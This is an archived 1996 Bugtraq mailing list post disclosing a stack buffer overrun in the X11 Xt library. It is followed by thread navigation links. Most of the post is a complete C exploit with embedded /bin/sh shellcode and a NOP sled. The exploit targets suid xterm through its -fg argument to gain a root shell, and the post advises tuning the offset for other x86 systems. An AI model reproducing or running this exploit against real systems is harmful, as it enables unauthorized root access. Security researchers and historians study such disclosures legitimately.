Bugtraq mailing list archives
Vulnerability in the Xt library
From: aleph1 () underground org (Aleph One)
Date: Sat, 24 Aug 1996 02:14:24 -0700
There exists at least one vulnerability in the Xt library caused by a buffer overrun that allows arbitrary code to be executed. This vulnerability exists in the Xt library itself. As such all programs linked with it that are suid root or can be coerced into running as root are vulnerable. The standard example is of curse suid xterm. The vulnerability has been confirmed under FreeBSD, Solaris, and as far as we can tell every single other OS running all revisions of X11. There exists a large number of places in the Xt library code where buffers allocated on the stack are handled insecurly other than the one used on the fallowing exploit. The Xt library is a can of worms. The original author of this vulnerability is "b0z0 bra1n". x86 exploit tested under FreeBSD fallows. For other x86 operating systems play around with the offset: #include <stdio.h> #include <stdlib.h> #include <unistd.h> #define DEFAULT_OFFSET 0 #define BUFFER_SIZE 1491 long get_esp(void) { __asm__("movl %esp,%eax\n"); } main(int argc, char **argv) { char *buff = NULL; unsigned long *addr_ptr = NULL; char *ptr = NULL; char execshell[] = "\xeb\x23" "\x5e" "\x8d\x1e" "\x89\x5e\x0b" "\x31\xd2" "\x89\x56\x07" "\x89\x56\x0f" "\x89\x56\x14" "\x88\x56\x19" "\x31\xc0" "\xb0\x3b" "\x8d\x4e\x0b" "\x89\xca" "\x52" "\x51" "\x53" "\x50" "\xeb\x18" "\xe8\xd8\xff\xff\xff" "/bin/sh" "\x01\x01\x01\x01" "\x02\x02\x02\x02" "\x03\x03\x03\x03" "\x9a\x04\x04\x04\x04\x07\x04"; int i, ofs=DEFAULT_OFFSET, bs=BUFFER_SIZE; if(argc>1) ofs=atoi(argv[1]); if(argc>2) bs=atoi(argv[2]); printf("Using offset of esp + %d (%x)\nBuffer size %d\n", ofs, get_esp()+ofs, bs); buff = malloc(4096); if(!buff) { printf("can't allocate memory\n"); exit(0); } ptr = buff; memset(ptr, 0x90, bs-strlen(execshell)); ptr += bs-strlen(execshell); for(i=0;i < strlen(execshell);i++) *(ptr++) = execshell[i]; addr_ptr = (long *)ptr; for(i=0;i < (8/4);i++) *(addr_ptr++) = get_esp() + ofs; ptr = (char *)addr_ptr; *ptr = 0; execl("/usr/X11R6/bin/xterm", "xterm", "-fg", buff, NULL); } Aleph One / aleph1 () underground org http://underground.org/ KeyID 1024/948FD6B5 Fingerprint EE C9 E8 AA CB AF 09 61 8C 39 EA 47 A8 6A B8 01
Current thread:
- BUG in /bin/bash Seven Up (Aug 22)
- <Possible follow-ups>
- Re: BUG in /bin/bash Red Barchetta (Aug 22)
- Re: BUG in /bin/bash The Ghost who Admins (Aug 22)
- Re: BUG in /bin/bash Digital Dreamer (Aug 22)
- Re: BUG in /bin/bash Earle Ake (Aug 22)
- IE 3.0? InterAccess Support Manager (Aug 22)
- Re: IE 3.0? Dave Andersen (Aug 23)
- More on the UnixWare problem Todd Vierling (Aug 23)
- resolv+ and finger... C. Hodges (Aug 23)
- Vulnerability in the Xt library Aleph One (Aug 24)
- Re: Vulnerability in the Xt library Stefan `Sec` Zehl (Aug 25)
- Re: Vulnerability in the Xt library Mike Neuman (Aug 27)
- Re: Vulnerability in the Xt library Casper Dik (Aug 28)
- Re: Vulnerability in the Xt library Mike Neuman (Aug 28)
- RFD: libsuid VaX#n8 (Aug 24)
- More on UnixWare 2.x vulnerability Todd Vierling (Aug 24)
- Re: (WORKAROUND) More on UnixWare 2.x vulnerability Hannu Laurila (Aug 24)
- polyglots (multi-language programs) John Nemeth (Aug 24)